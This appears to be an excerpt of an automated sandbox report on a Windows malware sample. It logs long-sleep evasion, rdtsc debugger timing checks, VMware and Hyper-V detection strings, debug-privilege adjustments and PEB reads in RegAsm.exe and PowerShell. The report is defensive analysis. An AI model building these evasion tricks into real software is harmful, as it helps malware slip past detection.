Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500 Thread sleep time: -11990383647911201s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6548 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -21213755684765971s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep count: 4983 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 Thread sleep count: 4229 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340 Thread sleep count: 78 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252 Thread sleep time: -24903104499507879s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4324 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5816 Thread sleep count: 3828 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep count: 3230 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408D00 rdtsc 9_2_00408D00
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2039 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4119 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3084 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3920 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4368 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3925 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 384 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1367 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4983 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4229 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 783
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3828
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3230
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 8.5 %
Source: C:\Windows\SysWOW64\cmmon32.exe API coverage: 8.6 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 5.2 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: explorer.exe, 0000000A.00000003.563410096.0000000007EFB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.538181499.0000000006900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000006.00000002.503512245.0000012FE01C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.487271451.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000A.00000000.518268066.0000000007F91000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_00408D00 rdtsc 9_2_00408D00
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7AAB0 mov eax, dword ptr fs:[00000030h] 9_2_02B7AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7AAB0 mov eax, dword ptr fs:[00000030h] 9_2_02B7AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9FAB0 mov eax, dword ptr fs:[00000030h] 9_2_02B9FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B652A5 mov eax, dword ptr fs:[00000030h] 9_2_02B652A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9D294 mov eax, dword ptr fs:[00000030h] 9_2_02B9D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9D294 mov eax, dword ptr fs:[00000030h] 9_2_02B9D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92AE4 mov eax, dword ptr fs:[00000030h] 9_2_02B92AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92ACB mov eax, dword ptr fs:[00000030h] 9_2_02B92ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA4A2C mov eax, dword ptr fs:[00000030h] 9_2_02BA4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA4A2C mov eax, dword ptr fs:[00000030h] 9_2_02BA4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2EA55 mov eax, dword ptr fs:[00000030h] 9_2_02C2EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6AA16 mov eax, dword ptr fs:[00000030h] 9_2_02B6AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6AA16 mov eax, dword ptr fs:[00000030h] 9_2_02B6AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1B260 mov eax, dword ptr fs:[00000030h] 9_2_02C1B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1B260 mov eax, dword ptr fs:[00000030h] 9_2_02C1B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38A62 mov eax, dword ptr fs:[00000030h] 9_2_02C38A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B83A1C mov eax, dword ptr fs:[00000030h] 9_2_02B83A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov ecx, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B65210 mov eax, dword ptr fs:[00000030h] 9_2_02B65210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B78A0A mov eax, dword ptr fs:[00000030h] 9_2_02B78A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA927A mov eax, dword ptr fs:[00000030h] 9_2_02BA927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AA16 mov eax, dword ptr fs:[00000030h] 9_2_02C2AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AA16 mov eax, dword ptr fs:[00000030h] 9_2_02C2AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BF4257 mov eax, dword ptr fs:[00000030h] 9_2_02BF4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h] 9_2_02B69240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h] 9_2_02B69240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h] 9_2_02B69240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69240 mov eax, dword ptr fs:[00000030h] 9_2_02B69240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h] 9_2_02B94BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h] 9_2_02B94BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94BAD mov eax, dword ptr fs:[00000030h] 9_2_02B94BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9B390 mov eax, dword ptr fs:[00000030h] 9_2_02B9B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92397 mov eax, dword ptr fs:[00000030h] 9_2_02B92397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B71B8F mov eax, dword ptr fs:[00000030h] 9_2_02B71B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B71B8F mov eax, dword ptr fs:[00000030h] 9_2_02B71B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1D380 mov ecx, dword ptr fs:[00000030h] 9_2_02C1D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2138A mov eax, dword ptr fs:[00000030h] 9_2_02C2138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8DBE9 mov eax, dword ptr fs:[00000030h] 9_2_02B8DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B903E2 mov eax, dword ptr fs:[00000030h] 9_2_02B903E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C35BA5 mov eax, dword ptr fs:[00000030h] 9_2_02C35BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE53CA mov eax, dword ptr fs:[00000030h] 9_2_02BE53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE53CA mov eax, dword ptr fs:[00000030h] 9_2_02BE53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38B58 mov eax, dword ptr fs:[00000030h] 9_2_02C38B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B93B7A mov eax, dword ptr fs:[00000030h] 9_2_02B93B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B93B7A mov eax, dword ptr fs:[00000030h] 9_2_02B93B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6DB60 mov ecx, dword ptr fs:[00000030h] 9_2_02B6DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2131B mov eax, dword ptr fs:[00000030h] 9_2_02C2131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6F358 mov eax, dword ptr fs:[00000030h] 9_2_02B6F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6DB40 mov eax, dword ptr fs:[00000030h] 9_2_02B6DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9F0BF mov ecx, dword ptr fs:[00000030h] 9_2_02B9F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9F0BF mov eax, dword ptr fs:[00000030h] 9_2_02B9F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9F0BF mov eax, dword ptr fs:[00000030h] 9_2_02B9F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA90AF mov eax, dword ptr fs:[00000030h] 9_2_02BA90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B920A0 mov eax, dword ptr fs:[00000030h] 9_2_02B920A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69080 mov eax, dword ptr fs:[00000030h] 9_2_02B69080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE3884 mov eax, dword ptr fs:[00000030h] 9_2_02BE3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE3884 mov eax, dword ptr fs:[00000030h] 9_2_02BE3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h] 9_2_02B640E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h] 9_2_02B640E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B640E1 mov eax, dword ptr fs:[00000030h] 9_2_02B640E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B658EC mov eax, dword ptr fs:[00000030h] 9_2_02B658EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov ecx, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFB8D0 mov eax, dword ptr fs:[00000030h] 9_2_02BFB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9002D mov eax, dword ptr fs:[00000030h] 9_2_02B9002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h] 9_2_02B7B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h] 9_2_02B7B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h] 9_2_02B7B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7B02A mov eax, dword ptr fs:[00000030h] 9_2_02B7B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h] 9_2_02BE7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h] 9_2_02BE7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7016 mov eax, dword ptr fs:[00000030h] 9_2_02BE7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C22073 mov eax, dword ptr fs:[00000030h] 9_2_02C22073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C31074 mov eax, dword ptr fs:[00000030h] 9_2_02C31074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C34015 mov eax, dword ptr fs:[00000030h] 9_2_02C34015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C34015 mov eax, dword ptr fs:[00000030h] 9_2_02C34015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B80050 mov eax, dword ptr fs:[00000030h] 9_2_02B80050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B80050 mov eax, dword ptr fs:[00000030h] 9_2_02B80050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h] 9_2_02BE51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h] 9_2_02BE51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h] 9_2_02BE51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE51BE mov eax, dword ptr fs:[00000030h] 9_2_02BE51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE69A6 mov eax, dword ptr fs:[00000030h] 9_2_02BE69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B961A0 mov eax, dword ptr fs:[00000030h] 9_2_02B961A0
